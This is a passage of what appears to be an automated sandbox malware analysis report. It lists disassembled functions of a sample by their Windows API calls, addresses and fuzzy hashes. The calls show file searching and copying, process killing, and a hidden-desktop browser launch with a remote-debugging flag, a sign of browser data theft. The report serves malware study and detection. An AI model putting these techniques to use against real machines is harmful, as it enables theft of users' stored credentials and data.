                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E15E4
                                • StrCmpCA.SHLWAPI(?,00CFDF68), ref: 004E1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1685
                                • StrCmpCA.SHLWAPI(?,00CFDEA8), ref: 004E16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E181C
                                • FindClose.KERNEL32(00000000), ref: 004E182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: c909d8fb85272f46adf941bf3d5e0e28dad020277ed5058682a89abfab25b0a2
                                • Instruction ID: 7e53ff847c0280b4ffb17749b52c3ffd45bae3800fc23ce5dddfd8187bed4c09
                                • Opcode Fuzzy Hash: c909d8fb85272f46adf941bf3d5e0e28dad020277ed5058682a89abfab25b0a2
                                • Instruction Fuzzy Hash: 19129270A102469BDB20EF76D999AAF77B8AF44305F04852EF84697361DF3CDC018B98
                                Function 004ECBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 004ECBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 004ECC13
                                • lstrcat.KERNEL32(?,?), ref: 004ECC5F
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004ECC71
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004ECC8B
                                • wsprintfA.USER32 ref: 004ECCB0
                                • PathMatchSpecA.SHLWAPI(?,00CF9340), ref: 004ECCE2
                                • CoInitialize.OLE32(00000000), ref: 004ECCEE
                                  • Part of subcall function 004ECAE0: CoCreateInstance.COMBASE(004FB110,00000000,00000001,004FB100,?), ref: 004ECB06
                                  • Part of subcall function 004ECAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 004ECB46
                                  • Part of subcall function 004ECAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 004ECBC9
                                • CoUninitialize.COMBASE ref: 004ECD09
                                • lstrcat.KERNEL32(?,?), ref: 004ECD2E
                                • lstrlen.KERNEL32(?), ref: 004ECD3B
                                • StrCmpCA.SHLWAPI(?,004FCFEC), ref: 004ECD55
                                • wsprintfA.USER32 ref: 004ECD7D
                                • wsprintfA.USER32 ref: 004ECD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004ECDB0
                                • wsprintfA.USER32 ref: 004ECDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004ECDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004ECE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004ECE28
                                • CloseHandle.KERNEL32(00000000), ref: 004ECE33
                                • CloseHandle.KERNEL32(00000000), ref: 004ECE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004ECE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 004ECE94
                                • FindNextFileA.KERNEL32(?,?), ref: 004ECF8D
                                • FindClose.KERNEL32(?), ref: 004ECF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: ba18dcad1fa1543d65e51847647703a6a2968bcc8437bef9f612b80ba18be6b2
                                • Instruction ID: 26712b1252ac0fb0a055e59248a85eff429cbd1053cdd2f01d49a7dadc9f0f98
                                • Opcode Fuzzy Hash: ba18dcad1fa1543d65e51847647703a6a2968bcc8437bef9f612b80ba18be6b2
                                • Instruction Fuzzy Hash: 03C19071A002599FCB60DF65DC84EEE7779FF44301F00859AF50997290DE38AA45CF99
                                Function 004E1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E12BF
                                • lstrlen.KERNEL32(00504CA8), ref: 004E12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12E7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E133A
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E135C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1376
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E13E2
                                • lstrlen.KERNEL32(00501794), ref: 004E13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E140A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1416
                                • lstrlen.KERNEL32(?), ref: 004E1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1443
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E147A
                                • StrCmpCA.SHLWAPI(?,00CFDF98), ref: 004E14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1535
                                • StrCmpCA.SHLWAPI(?,00CFE660), ref: 004E1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E181C
                                • FindClose.KERNEL32(00000000), ref: 004E182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 9daa617f7b6bfa8db3bcffb05051ed0fc3c11d4558731a5209604ff2fe158bd1
                                • Instruction ID: b424fec51194e847c110c12e8574693380e8a4dcc9384d8d7c9603c43b588946
                                • Opcode Fuzzy Hash: 9daa617f7b6bfa8db3bcffb05051ed0fc3c11d4558731a5209604ff2fe158bd1
                                • Instruction Fuzzy Hash: 79C1D270A1025A9BDB21EF76DD99AAF77B8AF10305F04416AF84693361DF3CDC018B98
                                Function 004D9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004D9790
                                • lstrcat.KERNEL32(?,?), ref: 004D97A0
                                • lstrcat.KERNEL32(?,?), ref: 004D97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 004D97C3
                                • memset.MSVCRT ref: 004D97D7
                                  • Part of subcall function 004F3E70: lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F3EA5
                                  • Part of subcall function 004F3E70: lstrcpy.KERNEL32(00000000,00CFEB58), ref: 004F3ECF
                                  • Part of subcall function 004F3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,004D134E,?,0000001A), ref: 004F3ED9
                                • wsprintfA.USER32 ref: 004D9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 004D9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 004D9844
                                  • Part of subcall function 004F46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004F46B9
                                  • Part of subcall function 004F46A0: Process32First.KERNEL32(00000000,00000128), ref: 004F46C9
                                  • Part of subcall function 004F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 004F46DB
                                  • Part of subcall function 004F46A0: StrCmpCA.SHLWAPI(?,?), ref: 004F46ED
                                  • Part of subcall function 004F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F4702
                                  • Part of subcall function 004F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F4711
                                  • Part of subcall function 004F46A0: CloseHandle.KERNEL32(00000000), ref: 004F4718
                                  • Part of subcall function 004F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 004F4726
                                  • Part of subcall function 004F46A0: CloseHandle.KERNEL32(00000000), ref: 004F4731
                                • lstrcat.KERNEL32(00000000,?), ref: 004D9878
                                • lstrcat.KERNEL32(00000000,?), ref: 004D9889
                                • lstrcat.KERNEL32(00000000,00504B60), ref: 004D989B
                                • memset.MSVCRT ref: 004D98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004D98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D9903
                                • StrStrA.SHLWAPI(00000000,00CFF798), ref: 004D9919
                                • lstrcpyn.KERNEL32(007093D0,00000000,00000000), ref: 004D9938
                                • lstrlen.KERNEL32(?), ref: 004D994B
                                • wsprintfA.USER32 ref: 004D995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 004D9971
                                • Sleep.KERNEL32(00001388), ref: 004D99E7
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D92E1
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D92FA
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D9399
                                  • Part of subcall function 004D92B0: strlen.MSVCRT ref: 004D93E6
                                  • Part of subcall function 004F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 004F4759
                                  • Part of subcall function 004F4740: Process32First.KERNEL32(00000000,00000128), ref: 004F4769
                                  • Part of subcall function 004F4740: Process32Next.KERNEL32(00000000,00000128), ref: 004F477B
                                  • Part of subcall function 004F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F479C
                                  • Part of subcall function 004F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 004F47AB
                                  • Part of subcall function 004F4740: CloseHandle.KERNEL32(00000000), ref: 004F47B2
                                  • Part of subcall function 004F4740: Process32Next.KERNEL32(00000000,00000128), ref: 004F47C0
                                  • Part of subcall function 004F4740: CloseHandle.KERNEL32(00000000), ref: 004F47CB
                                • CloseDesktop.USER32(?), ref: 004D9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 5676a0ee5b6d819dd8063d413fba929e557499a42c78a914ffda6a1d25012c96
                                • Instruction ID: 3dd8a58a2904a2896953a65b92041c36ebfef78d5477bc563972808d22de7ae7
                                • Opcode Fuzzy Hash: 5676a0ee5b6d819dd8063d413fba929e557499a42c78a914ffda6a1d25012c96
                                • Instruction Fuzzy Hash: F6918371A10219EBDB10DF74DC45FEE77B8EF44700F10819AF609A7291DE78AE448BA8
                                Function 004EE210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 004EE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 004EE243
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004EE263
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004EE27D
                                • wsprintfA.USER32 ref: 004EE2A2
                                • StrCmpCA.SHLWAPI(?,004FCFEC), ref: 004EE2B4
                                • wsprintfA.USER32 ref: 004EE2D1
                                  • Part of subcall function 004EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 004EEE12
                                • wsprintfA.USER32 ref: 004EE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 004EE304
                                • lstrcat.KERNEL32(?,00CFFA58), ref: 004EE335
                                • lstrcat.KERNEL32(?,00501794), ref: 004EE347
                                • lstrcat.KERNEL32(?,?), ref: 004EE358
                                • lstrcat.KERNEL32(?,00501794), ref: 004EE36A
                                • lstrcat.KERNEL32(?,?), ref: 004EE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004EE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE422
                                • DeleteFileA.KERNEL32(?), ref: 004EE45C
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004EE49B
                                • FindClose.KERNEL32(00000000), ref: 004EE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: f9e587af5fa752c3d7b0d581cec3c24a226b9d64a9ed1c7ea1d401fc90c5c11e
                                • Instruction ID: 32907bddd1a4678b85bf8914f03f3ba7a7c2a774439c9f0184938b7d091c88e9
                                • Opcode Fuzzy Hash: f9e587af5fa752c3d7b0d581cec3c24a226b9d64a9ed1c7ea1d401fc90c5c11e
                                • Instruction Fuzzy Hash: 63818271900219DBCB20EF75DD45AEF7779BF44300F00869AF64A93291DE78AA44CF99
                                Function 004D16B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D16E2
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D176C
                                • lstrcat.KERNEL32(00000000), ref: 004D1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004D18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: df7627b83d9967828fb3d51a861ea988ef38c599195c16e638b50a56eff98cb9
                                • Instruction ID: cbe51061d89d9d021ee5623dc24c26b3ddd34e6421ffd2ded66de4b0c557338d
                                • Opcode Fuzzy Hash: df7627b83d9967828fb3d51a861ea988ef38c599195c16e638b50a56eff98cb9
                                • Instruction Fuzzy Hash: 4E817170A1021AEBCB21EF65DAA5AAF77B4EF10304F04516BFD0597362CB789C01CB99
                                Function 004EDD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004EDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004EDD4C
                                • wsprintfA.USER32 ref: 004EDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 004EDD79
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004EDD9C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004EDDB6
                                • wsprintfA.USER32 ref: 004EDDD4
                                • DeleteFileA.KERNEL32(?), ref: 004EDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004EDDED
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                  • Part of subcall function 004ED980: memset.MSVCRT ref: 004ED9A1
                                  • Part of subcall function 004ED980: memset.MSVCRT ref: 004ED9B3
                                  • Part of subcall function 004ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004ED9DB
                                  • Part of subcall function 004ED980: lstrcpy.KERNEL32(00000000,?), ref: 004EDA0E
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00000000), ref: 004EDA1C
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,00CFF840), ref: 004EDA36
                                  • Part of subcall function 004ED980: lstrcat.KERNEL32(?,?), ref: 004EDA4A
